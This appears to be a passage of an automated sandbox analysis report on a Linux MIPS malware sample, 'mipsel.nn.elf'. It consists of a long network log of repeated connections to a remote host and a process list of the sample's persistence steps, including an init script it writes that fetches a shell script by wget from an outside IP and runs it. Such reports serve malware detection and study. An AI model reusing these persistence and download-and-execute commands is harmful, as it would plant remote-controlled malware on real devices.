                                                                                        Dec 24, 2024 09:44:11.974750996 CET382426010494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:11.975003958 CET6010438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:12.337871075 CET6010638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:12.457590103 CET382426010694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:12.457741022 CET6010638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:12.457815886 CET6010638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:12.577523947 CET382426010694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:12.965022087 CET6010638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:13.128561020 CET382426010694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:13.572640896 CET382426010694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:13.572822094 CET6010638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:13.967015982 CET6010838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:14.088570118 CET382426010894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:14.088741064 CET6010838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:14.088804960 CET6010838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:14.208470106 CET382426010894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:14.594145060 CET6010838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:14.756625891 CET382426010894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:15.216005087 CET382426010894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:15.216281891 CET6010838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:15.595909119 CET6011038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:15.717497110 CET382426011094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:15.717746019 CET6011038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:15.717844963 CET6011038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:15.837486029 CET382426011094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:16.224329948 CET6011038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:16.384701014 CET382426011094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:16.838068008 CET382426011094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:16.838382006 CET6011038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:17.226238012 CET6011238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:17.346110106 CET382426011294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:17.346374989 CET6011238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:17.346374989 CET6011238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:17.466057062 CET382426011294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:17.852500916 CET6011238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:18.012521029 CET382426011294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:18.467658997 CET382426011294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:18.467957020 CET6011238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:18.854171038 CET6011438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:18.975308895 CET382426011494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:18.975598097 CET6011438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:18.975720882 CET6011438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:19.095202923 CET382426011494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:19.482239962 CET6011438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:19.648577929 CET382426011494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:20.100305080 CET382426011494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:20.100532055 CET6011438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:20.484069109 CET6011638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:20.603823900 CET382426011694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:20.603988886 CET6011638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:20.604052067 CET6011638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:20.723798990 CET382426011694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:21.109941959 CET6011638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:21.272602081 CET382426011694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:21.729243994 CET382426011694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:21.729593039 CET6011638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:22.111630917 CET6011838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:22.231390953 CET382426011894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:22.231774092 CET6011838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:22.231935024 CET6011838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:22.351464987 CET382426011894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:22.738168001 CET6011838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:22.900584936 CET382426011894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:23.368005991 CET382426011894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:23.368163109 CET6011838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:23.739897966 CET6012038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:23.859685898 CET382426012094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:23.859787941 CET6012038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:23.859863043 CET6012038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:23.979615927 CET382426012094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:24.364697933 CET6012038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:24.524621010 CET382426012094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:24.994846106 CET382426012094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:24.995122910 CET6012038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:25.366245031 CET6012238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:25.485959053 CET382426012294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:25.486109972 CET6012238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:25.486149073 CET6012238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:25.605803967 CET382426012294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:25.990890026 CET6012238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:26.152772903 CET382426012294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:26.616812944 CET382426012294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:26.617070913 CET6012238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:26.992505074 CET6012438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:27.112663031 CET382426012494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:27.112906933 CET6012438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:27.112906933 CET6012438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:27.232635021 CET382426012494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:27.617918968 CET6012438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:27.780611038 CET382426012494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:28.239428997 CET382426012494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:28.239655018 CET6012438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:28.619497061 CET6012638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:28.739310026 CET382426012694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:28.739535093 CET6012638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:28.739535093 CET6012638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:28.859232903 CET382426012694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:29.244947910 CET6012638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:29.408550024 CET382426012694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:29.865056992 CET382426012694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:29.865340948 CET6012638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:30.246655941 CET6012838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:30.366381884 CET382426012894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:30.366780043 CET6012838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:30.366780043 CET6012838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:30.486526966 CET382426012894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:30.872330904 CET6012838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:31.032524109 CET382426012894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:31.491787910 CET382426012894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:31.492121935 CET6012838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:31.874006987 CET6013038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:31.993654013 CET382426013094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:31.993870020 CET6013038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:31.993870020 CET6013038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:32.113879919 CET382426013094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:32.499430895 CET6013038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:32.660655022 CET382426013094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:33.109692097 CET382426013094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:33.109899044 CET6013038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:33.500653028 CET6013238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:33.620513916 CET382426013294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:33.620661020 CET6013238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:33.620820999 CET6013238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:33.740331888 CET382426013294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:34.125658035 CET6013238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:34.292586088 CET382426013294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:34.750262976 CET382426013294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:34.750550032 CET6013238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:35.127214909 CET6013438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:35.246926069 CET382426013494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:35.247047901 CET6013438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:35.247215986 CET6013438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:35.369004965 CET382426013494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:35.752490997 CET6013438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:35.918394089 CET382426013494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:36.367127895 CET382426013494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:36.367360115 CET6013438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:36.754297972 CET6013638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:36.874136925 CET382426013694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:36.874339104 CET6013638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:36.874521017 CET6013638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:36.994086027 CET382426013694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:37.378864050 CET6013638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:37.540631056 CET382426013694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:38.010104895 CET382426013694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:38.010497093 CET6013638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:38.380422115 CET6013838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:38.500118017 CET382426013894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:38.500495911 CET6013838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:38.500495911 CET6013838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:38.620181084 CET382426013894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:39.005136967 CET6013838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:39.168555975 CET382426013894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:39.621071100 CET382426013894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:39.621341944 CET6013838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:40.006705046 CET6014038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:40.126785994 CET382426014094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:40.127084970 CET6014038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:40.127084970 CET6014038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:40.246851921 CET382426014094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:40.632131100 CET6014038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:40.792701960 CET382426014094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:41.264316082 CET382426014094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:41.264566898 CET6014038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:41.633826971 CET6014238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:41.753635883 CET382426014294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:41.753902912 CET6014238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:41.753902912 CET6014238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:41.873545885 CET382426014294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:42.259151936 CET6014238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:42.420684099 CET382426014294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:42.877325058 CET382426014294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:42.877476931 CET6014238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:43.260669947 CET6014438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:43.380289078 CET382426014494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:43.380423069 CET6014438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:43.380513906 CET6014438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:43.500117064 CET382426014494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:43.886311054 CET6014438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:44.048743010 CET382426014494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:44.503174067 CET382426014494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:44.503377914 CET6014438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:44.887973070 CET6014638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:45.007709980 CET382426014694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:45.007970095 CET6014638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:45.007970095 CET6014638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:45.128097057 CET382426014694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:45.513536930 CET6014638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:45.680563927 CET382426014694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:46.142503977 CET382426014694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:46.142713070 CET6014638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:46.514978886 CET6014838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:46.634829998 CET382426014894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:46.634980917 CET6014838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:46.635025024 CET6014838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:46.754759073 CET382426014894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:47.139834881 CET6014838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:47.300769091 CET382426014894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:47.772833109 CET382426014894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:47.773041010 CET6014838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:48.141448021 CET6015038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:48.261301041 CET382426015094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:48.261429071 CET6015038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:48.261531115 CET6015038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:48.381283998 CET382426015094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:48.768147945 CET6015038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:48.928709030 CET382426015094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:49.385401011 CET382426015094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:49.385730982 CET6015038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:49.769859076 CET6015238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:49.889815092 CET382426015294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:49.890182972 CET6015238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:49.890183926 CET6015238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:50.009911060 CET382426015294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:50.395874977 CET6015238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:50.560699940 CET382426015294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:51.020607948 CET382426015294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:51.020818949 CET6015238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:51.397418976 CET6015438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:51.517261028 CET382426015494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:51.517529964 CET6015438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:51.517529964 CET6015438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:51.637372017 CET382426015494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:52.023507118 CET6015438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:52.188632965 CET382426015494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:52.630283117 CET382426015494.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:52.630598068 CET6015438242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:53.025268078 CET6015638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:53.145072937 CET382426015694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:53.145226002 CET6015638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:53.145325899 CET6015638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:53.265010118 CET382426015694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:53.651072025 CET6015638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:53.816638947 CET382426015694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:54.258121967 CET382426015694.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:54.258559942 CET6015638242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:54.654299974 CET6015838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:54.774272919 CET382426015894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:54.774523973 CET6015838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:54.774524927 CET6015838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:54.894227982 CET382426015894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:55.280348063 CET6015838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:55.440566063 CET382426015894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:55.891725063 CET382426015894.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:55.892096996 CET6015838242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:56.281920910 CET6016038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:56.401736975 CET382426016094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:56.401823997 CET6016038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:56.401993990 CET6016038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:56.521609068 CET382426016094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:56.908624887 CET6016038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:57.068831921 CET382426016094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:57.529248953 CET382426016094.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:57.529486895 CET6016038242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:57.910579920 CET6016238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:58.030349016 CET382426016294.156.227.234192.168.2.23
                                                                                        Dec 24, 2024 09:44:58.030469894 CET6016238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:58.030679941 CET6016238242192.168.2.2394.156.227.234
                                                                                        Dec 24, 2024 09:44:58.150394917 CET382426016294.156.227.234192.168.2.23

                                                                                        System Behavior

                                                                                        Start time (UTC):08:42:51
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:/tmp/mipsel.nn.elf
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/bin/systemctl
                                                                                        Arguments:systemctl enable custom.service
                                                                                        File size:996584 bytes
                                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/bin/chmod
                                                                                        Arguments:chmod +x /etc/init.d/system
                                                                                        File size:63864 bytes
                                                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/bin/ln
                                                                                        Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                                        File size:76160 bytes
                                                                                        MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/tmp/mipsel.nn.elf
                                                                                        Arguments:-
                                                                                        File size:5773336 bytes
                                                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):08:42:52
                                                                                        Start date (UTC):24/12/2024
                                                                                        Path:/usr/bin/chmod
                                                                                        Arguments:chmod +x /etc/init.d/mipsel.nn.elf
                                                                                        File size:63864 bytes
                                                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

